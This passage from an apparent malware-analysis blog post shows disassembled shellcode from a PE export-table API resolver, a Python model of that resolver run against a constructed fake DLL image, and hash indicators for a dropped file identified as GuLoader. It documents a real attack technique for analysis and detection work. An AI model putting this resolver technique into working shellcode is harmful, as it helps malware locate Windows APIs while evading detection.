        000006c2 f7 d9           NEG        ECX
        000006c4 8b 58 24        MOV        EBX,dword ptr [EAX + 0x24]
        000006c7 01 d3           ADD        EBX,EDX
        000006c9 0f b7 1c 4b     MOVZX      EBX,word ptr [EBX + ECX*0x2]
        000006cd 8b 40 1c        MOV        EAX,dword ptr [EAX + 0x1c]
        000006d0 8d 04 98        LEA        EAX,[EAX + EBX*0x4]
        000006d3 8b 04 10        MOV        EAX,dword ptr [EAX + EDX*0x1]
        000006d6 01 d0           ADD        EAX,EDX
        000006d8 eb 0c           JMP        LAB_000006e6
                             LAB_000006da                                    XREF[1]:     000006bb(j)  
        000006da 83 c3 04        ADD        EBX,0x4
        000006dd 59              POP        ECX
        000006de 49              DEC        ECX
        000006df eb bf           JMP        LAB_000006a0
                             LAB_000006e1                                    XREF[1]:     000006a2(j)  
        000006e1 31 c0           XOR        EAX,EAX
        000006e3 83 c4 04        ADD        ESP,0x4
                             LAB_000006e6                                    XREF[1]:     000006d8(j)  
        000006e6 5f              POP        EDI
        000006e7 5e              POP        ESI
        000006e8 5a              POP        EDX
        000006e9 5b              POP        EBX
        000006ea c2 08 00        RET        0x8
        000006ed 6e 3d d4
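As an added example (not the post's own code), here is a Python model of two of the resolver routines listed above: FUN_00000631's name match, which compares only up to the end of the wanted name and flips ASCII case with XOR 0x20, and FUN_00000682's export-table walk, which compares the full name including its terminator and hops name index to ordinal to function RVA. The PE image it walks is a constructed flat buffer (offset == RVA), not a real DLL.

```python
import struct


def u16(b: bytes, o: int) -> int:
    return struct.unpack_from("<H", b, o)[0]


def u32(b: bytes, o: int) -> int:
    return struct.unpack_from("<I", b, o)[0]


def module_name_matches(wanted: str, base_dll_name: str) -> bool:
    """Model of FUN_00000631. The loop ends at wanted's terminator and returns
    1, so u"kernel32" matches the PEB entry "KERNEL32.DLL" (a prefix match);
    a character only counts as equal directly or after XOR 0x20 on a letter."""
    for i, w in enumerate(wanted):
        c = base_dll_name[i] if i < len(base_dll_name) else "\0"
        if w == c:
            continue
        if w.isascii() and w.isalpha() and w.swapcase() == c:
            continue
        return False
    return True


def find_export(image: bytes, base: int, name: str) -> int:
    """Model of FUN_00000682 over a module loaded at `base`. REPE CMPSB compares
    strlen(export)+1 bytes, so the match includes the NUL; on a hit the name
    index is mapped through AddressOfNameOrdinals into AddressOfFunctions."""
    e_lfanew = u32(image, 0x3C)
    exp = u32(image, e_lfanew + 0x78)            # DataDirectory[0]: export table RVA
    n_names = u32(image, exp + 0x18)
    funcs = u32(image, exp + 0x1C)
    names = u32(image, exp + 0x20)
    ordinals = u32(image, exp + 0x24)
    target = name.encode() + b"\0"
    for i in range(n_names):
        rva = u32(image, names + 4 * i)
        if image[rva:rva + len(target)] == target:
            return base + u32(image, funcs + 4 * u16(image, ordinals + 2 * i))
    return 0                                     # XOR EAX,EAX path


def build_image(exports: dict) -> bytes:
    """Constructed minimal PE32 image (test data, not a real DLL) with only
    the fields the resolver touches. Ordinals are deliberately not equal to
    the name index so the ordinal hop is exercised."""
    img = bytearray(0x400)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)      # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    exp = 0x200
    struct.pack_into("<I", img, 0x80 + 0x78, exp)
    ordered = sorted(exports)                    # real export name tables are sorted
    n = len(ordered)
    funcs, names, ords = exp + 0x28, exp + 0x28 + 4 * n, exp + 0x28 + 8 * n
    strs = exp + 0x28 + 10 * n
    struct.pack_into("<IIII", img, exp + 0x14, n, n, funcs, names)
    struct.pack_into("<I", img, exp + 0x24, ords)
    for i, nm in enumerate(ordered):
        ordinal = n - 1 - i
        struct.pack_into("<I", img, funcs + 4 * ordinal, exports[nm])
        struct.pack_into("<I", img, names + 4 * i, strs)
        struct.pack_into("<H", img, ords + 2 * i, ordinal)
        img[strs:strs + len(nm) + 1] = nm.encode() + b"\0"
        strs += len(nm) + 1
    return bytes(img)


BASE = 0x7C800000                                # constructed load address
IMAGE = build_image({"LoadLibraryW": 0x1A00, "GetProcAddress": 0x1B00,
                     "ExpandEnvironmentStringsW": 0x1C00})

if __name__ == "__main__":
    print(module_name_matches("kernel32", "KERNEL32.DLL"))
    for api in ("LoadLibraryW", "GetProcAddress", "LoadLibrary"):
        print(api, hex(find_export(IMAGE, BASE, api)))
```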

Once the shellcode has finished executing, it drops the file conhost.exe in the tmp folder.

conhost.exe

MD5: 8ae5d58be1f0e18dcf150b83939c0f00

SHA256: 5c402005820d458af51125cc3fde9c0870a321ad314fa4a8de2f7dea382bdd6b

VT Link: https://www.virustotal.com/gui/file/5c402005820d458af51125cc3fde9c0870a321ad314fa4a8de2f7dea382bdd6b

A preliminary analysis of the file shows that it is an NSIS installer which executes shellcode. The file appears to be GuLoader malware, which deserves its own separate blog post.